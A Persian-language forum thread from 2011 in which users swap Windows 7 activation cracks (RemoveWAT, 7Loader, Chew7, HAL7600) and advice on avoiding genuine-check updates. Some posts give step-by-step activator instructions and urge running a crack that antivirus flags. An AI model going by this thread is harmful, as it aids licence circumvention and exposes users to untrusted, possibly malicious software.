با حذف کرک و نصب اون (RestoreWat و RemoveWat) فرقی نمی کنه. البته می گم تنها مشکل، نوشته ی روی دسک تاپه. ضمناً ویندوز من Windows 7 Ultimate N هستش. لطفا اگه کسی راه حل رو میدونه کمک کنه.

varians
25-02-2011, 14:47
آقا دو سه هفته پیش گفتید قراره مایکروسافت نسخه فاینال sp1 رو بیرون بده ، پس چی شد ؟
خبری نشده ؟

ebicross
25-02-2011, 15:19
آقا دو سه هفته پیش گفتید قراره مایکروسافت نسخه فاینال sp1 رو بیرون بده ، پس چی شد ؟
خبری نشده ؟
این تاپیک برای کرک کردن ویندوز 7 هستش.

مایکروسافت این کار رو کرد:

amir raya
25-02-2011, 15:23
سلام. من دارم آپدیت پک 1 رو میگیرم. کرکم غیرفعاله. وقتی میخوام بیام تو ویندوز میگه ویندوز جنیوین نیست. اما میشه ضربدرش کرد. لودر هیچکاری نتونست کنه. همین که ویندوزم هنوز غیرفعال نشده رو مدیون remove wat هستم. اما میخوام بعد از نصب پک 1 جنیوین کنم. دیقا راهنمایی میکنید چیکار کنم؟
اینم بگم همه آپدیتای دیگه مایکروسافتو دانلود کردم. پست اولم خوندم و به نتیجه ای نرسیدم.

amir raya
25-02-2011, 16:09
اینم بعد از ارتقا به پک 1:

edi2
25-02-2011, 16:27
برای من هم همینطور شده و همین ور در قسمت پروپرتیس پیام میده باید چی کار کرد؟

Dew Drop
25-02-2011, 16:39
اینم بعد از ارتقا به پک 1:

از remove wat استفاده کنید که معمولاً جواب میده.

amir raya
25-02-2011, 19:43

digitalrn
26-02-2011, 17:07
سلام

پست اول رو کامل خوندم تنها اپدیتی که ویندوز رو از کار میندازه همین KB971033 است ؟
بعد از این اپدیت دیگ های نیامده ؟ چون ویندوز بدون اپدیت به درد نمیخوره و انتی ویروس ها مخصوصا ناد 32 حداکثر امنیت رو تضمین نمیکنن .

ebicross
26-02-2011, 17:11
سلام

پست اول رو کامل خوندم تنها اپدیتی که ویندوز رو از کار میندازه همین KB971033 است ؟
بعد از این اپدیت دیگ های نیامده ؟ چون ویندوز بدون اپدیت به درد نمیخوره و انتی ویروس ها مخصوصا ناد 32 حداکثر امنیت رو تضمین نمیکنن .
بله فقط همینه. مشکلی نیست.

j_m2009
26-02-2011, 18:10
آقا این مشکل ما حل نشد! همچنان عبارت This copy of Windows is not genuine روی دسک تاپه. چکار باید کرد؟ RemoveWat نسخه ی جدیدتر از 2.2 نداره؟

amir raya
26-02-2011, 19:29
کار منم راه ننداخت. چیکار کنم؟

varians
26-02-2011, 22:05
آقا آخرین ورژن Sp1 (فاینال) رو نصب کنین
من دیروز از سایت مایکروسافت دانلود کردم نصبیدم و با remove wat هم کرک کردم دیگه اون خط ها هم نمیاد رو دسکتاپ. :46:
فقط نمیدونم این remove wat هم ویندوزو جنیون میکنه یا فقط محدودیت 30 روزه رو بر میداره ؟ آخه اولین باره ازش استفاده می کنم
خیلی باحاله کلا اون قسمت مربوط به علامت جنیون و 30 روزه بودنو از راست کلیک my computer برداشته .

aramus
27-02-2011, 13:42
با استفاده از این فعال ساز به راحتی میتوانید win 7 خود را بدون هیچ مشکلی اکتیو کنید. برای 32 بیت و 64 بیت فرقی نمیکنه

طرز استفاده :

1) Activator را از آدرس زیر که براتون آپلود کردم دانلود کنین
size : 3.06 MB

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید2) روی یکی از آیکونهای قسمت Install OEM Information کلیک کنید

3) روی Install 7Loader کلیک کنید و صبر کنید خود ویندوز Restart شود

ای بابا
دوستان کمک کنن من ویندوزم یهو این بقل ساعت عکس یک کلید اومد بعد گفت باید اکتیو کنی منم از این برنامه تو نقل قول استفاده کردم حالا انتی ویروسم کار نمیکنه چیکار کنم ؟

ebicross
27-02-2011, 15:05
ای بابا
دوستان کمک کنن من ویندوزم یهو این بقل ساعت عکس یک کلید اومد بعد گفت باید اکتیو کنی منم از این برنامه تو نقل قول استفاده کردم حالا انتی ویروسم کار نمیکنه چیکار کنم ؟
اگر مشکل اکتیو بودن ویندوز حل شده این محصول رو حذف و بعد از ریست دوباره نصب کنید.

amir raya
27-02-2011, 15:21
آقا آخرین ورژن Sp1 (فاینال) رو نصب کنین
من دیروز از سایت مایکروسافت دانلود کردم نصبیدم و با remove wat هم کرک کردم دیگه اون خط ها هم نمیاد رو دسکتاپ. :46:
فقط نمیدونم این remove wat هم ویندوزو جنیون میکنه یا فقط محدودیت 30 روزه رو بر میداره ؟ آخه اولین باره ازش استفاده می کنم
خیلی باحاله کلا اون قسمت مربوط به علامت جنیون و 30 روزه بودنو از راست کلیک my computer برداشته .
من با آدیت ویندوزمو به پک 1 انتقال دادم. 30 روزه بودنو بر میداره از کلیک راست Computer. اما بالای ساعت هنوز نوشته جنیوین نیس.

Mohammad King
27-02-2011, 15:30
من با آدیت ویندوزمو به پک 1 انتقال دادم. 30 روزه بودنو بر میداره از کلیک راست Computer. اما بالای ساعت هنوز نوشته جنیوین نیس.
شما از remove wat در پست اول استفاده کنید.

اگر نشد از کرک های پست 1 استفاده کنید طبق توضیحات......

aramus
27-02-2011, 16:17
اگر مشکل اکتیو بودن ویندوز حل شده این محصول رو حذف و بعد از ریست دوباره نصب کنید.

حالا این ارور رو میده موقع نصب

ebicross
27-02-2011, 17:56

تاپیک ایجاد کنید در بخش مشکلات نرم افزاری.

شاید ویندوزتون کرک نیست. با این وضع نمیتونید از سایت مایکروسافت هم دانلود کنید.
یک کرک دیگه رو تست کنید.

en-com
27-02-2011, 22:08

برای منم اینجوری شده!!!
remove wat دارم اما اشتباه کردم آپدیت کردم
درست موقعی که ریست شد پیغام 30 روز به اتمام کار security essential اومد
ظاهرا راهی هم نداره
من همه راهها رو امتحان کردم ولی ....
دوستان این آپدیتها رو نگیرید : KB2479628 , KB2425227 ,KB2485376 , KB2393802
البته اینم هست : KB982726 , KB2482017 که از راست به ترتیب مال آپدیت IE9 و Office2010 هست و ممکنه از کار انداختن Sec Ess رو هم ضمیمه یکی از این دو تا کرده باشن. من اینها رو که گرفتم بعد یه ریست زدم اینجوری شد. یکی از اینها آپدیت از کار انداختن Sec Ess رو داره

موفق باشین

digitalrn
28-02-2011, 15:19
سلام

امروز یه آپدیت جدید اضافه شده
کسی در موردش میدونه ؟
اسمش windows 7 server pack 1 KB976932
آیا ارزش نصب داره گفته 44 تا 500 مگابایته ؟
نصب بشه ویندوز ار کار نیافته ؟
کسی تست کرده ؟

amir raya
28-02-2011, 18:43
شما از remove wat در پست اول استفاده کنید.

اگر نشد از کرک های پست 1 استفاده کنید طبق توضیحات......
از همشون استفاده کردم. فقط این remove wat قسمت پروپرتیز Computer رو درس کرد. اما هنوز موقع بالا اومدن ویندوز پیغام جنیوین کردن ویندوزو میده که البته میشه ضربدرش کرد. اما پایین دسکتاپم هنوز نوشته This copy of windows is not genuine.

Ali*Reza
28-02-2011, 21:26
از همشون استفاده کردم. فقط این remove wat قسمت پروپرتیز Computer رو درس کرد. اما هنوز موقع بالا اومدن ویندوز پیغام جنیوین کردن ویندوزو میده که البته میشه ضربدرش کرد. اما پایین دسکتاپم هنوز نوشته This copy of windows is not genuine.

من هم دقیقا همین مشکل رو دارم ، یعنی اون پیغام روی صفحه دسکتاپم همیشه هست.؟؟!!

samirs
01-03-2011, 07:54

اگه این اپدیتو نصب کنی + اپدیت هایی که تابه حال دریافت کردی ویندوزت به service pack 1 ارتقائ پیدا کنه.
البته برای من که باعث شد ویندوز از کار بیفته.

IranApadana
01-03-2011, 12:58
درود
ویندوز من سون سرویس پک 1 و 64 بیت هست
همه کرک ها رو امتحان کرده بودم اما کرک نشد تا اینکه با کرک Chew7 v1.1 تونستم کرکش کنم.
چند روزی هست این پیغام واسم میاد باید چیکار کنم؟

hamid_rad
01-03-2011, 15:37
سلام
من هم چند روز پیش ویندوزم اپددیت شد و دیدم که داره پیغام جنیون میده با برنامه remove wat هم جواب نداد لطفا یه برنامه معرفی کنید

Mohammad King
01-03-2011, 17:09
ماکروسافت با ارائه آپدیتی با کد KB971033 باعت از بین رفتن genuine ویندوز شده .

وقتی که این آپدیت رو نصب کنید در سمت راست و پایین اسکرین این عبارت رو میبینید :

با یک نرم افزار ساده میتوانید این مشکل رو برطرف کنید و دوباره ویندوز رو مثل سابق آپیت کنید .
لینک دانلود نرم افزار Remove WAT :

کد:

بعد از دانلود و اکسترکت فایل روی RemoveWAT.exe کلیک راست کنید و run as administrator رو بزنید .

حالا روی RemoveWAT کلیک کنید و منتظر بمونید تا نرم افزار کارش رو انجام بده و بعد با کلیک روی OK سیستم ریبوت میشه و مشکل genuine نبودن ویندوز حل میشه .

با نصب این برنامه کلا قسمت فعال سازی و جنیو ویندوز حذف میشه !

abolf@zl
02-03-2011, 14:16
سلام من این کارو کردم حتی آپدیت اخیر رو هم آنیستال کردم ولی بالای ساعت هم چنان این پیغام هست و بک گراند هم سیاه. ولی توی بخش سیستم پراپرتیس نمیگه که اصل نیست ویندوزت. از همین remove wat استفاده کردم و تمام کرک ها رو هم تست کردم ولی بالاس ساعت هم چنان این پیغام هست. باید چه کنم؟؟؟؟؟ ممنون

Ali*Reza
02-03-2011, 18:38
سلام من این کارو کردم حتی آپدیت اخیر رو هم آنیستال کردم ولی بالای ساعت هم چنان این پیغام هست و بک گراند هم سیاه. ولی توی بخش سیستم پراپرتیس نمیگه که اصل نیست ویندوزت. از همین remove wat استفاده کردم و تمام کرک ها رو هم تست کردم ولی بالاس ساعت هم چنان این پیغام هست. باید چه کنم؟؟؟؟؟ ممنون

خیلی ها از جمله من این مشکلو دارن ، ظاهرا جوابی براش پیدا نشده.

amir raya
02-03-2011, 18:50
منم از ریمو وت استفاده کردم. فقط پروپرتیز Computer درس شد. بقیش نه.

mr-secret
04-03-2011, 14:39
بهترین کرک win 7

سلام دوستان
من روزی 10 تا ویندوز نصب میکنم همشون هم با این کرک اکتیو میشن
ممکنه انتی ویرستون ویروس بشناسدش
مشکلی نیست خودم تست کردم خیلتون راحت ماله یه سایت عربیه
با تشکر

danial_2006
04-03-2011, 18:14
سلام.اکثر بچه هایی که مثل من نسخهenterprise دارن کرکایی مثل پست اول جواب نمیده.من دیشب HAL7600 v1.2 امتحان کردم جواب داد.یه سرچی به همین نام بکنید پیدا میکنید.

amir raya
04-03-2011, 18:25
بهترین کرک win 7

سلام دوستان
من روزی 10 تا ویندوز نصب میکنم همشون هم با این کرک اکتیو میشن
ممکنه انتی ویرستون ویروس بشناسدش
مشکلی نیست خودم تست کردم خیلتون راحت ماله یه سایت عربیه
با تشکر

داداش دمت اساسی گرم. :10::10:

mr-secret
04-03-2011, 23:03
سلام.اکثر بچه هایی که مثل من نسخهenterprise دارن کرکایی مثل پست اول جواب نمیده.من دیشب HAL7600 v1.2 امتحان کردم جواب داد.یه سرچی به همین نام بکنید پیدا میکنید.

کرک بالایی که من گذاشتم فرقی به حالش نمیکنه که چه نسخه ای از ویندوز باشه ماله من enterprise هست
با سپاس

imanpod
05-03-2011, 06:55
من ویندوز 7 ورژن 7600 build دارم . حالا میخوام سرویس پک 1 روش بریزم . میترسم از حالت active در بیاد . یه توضیح میدین چی کار کنم . راستی چون دانلود سرویس پک 1 خیلی وقت میبره ، میتونم یه dvd که سرویس پک 1 داره رو استفاده کنم ؟ اگه بشه باید repair کنم ؟ از روی ورژن دستکاری شده ی xdark deluxe (نمیدونم آشنایی دارین یا نه ، خیلی مزخرفه) میتونم سرویس پک 1 رو بریزم رو ویندوز فعلیم ؟

ebicross
05-03-2011, 18:07
Windows 7 Genuine Activation RemoveWAT 2.2.6.0
جدیدترین کرک منتشر شده که طبق ادعای طراحان 100 درصد جواب داده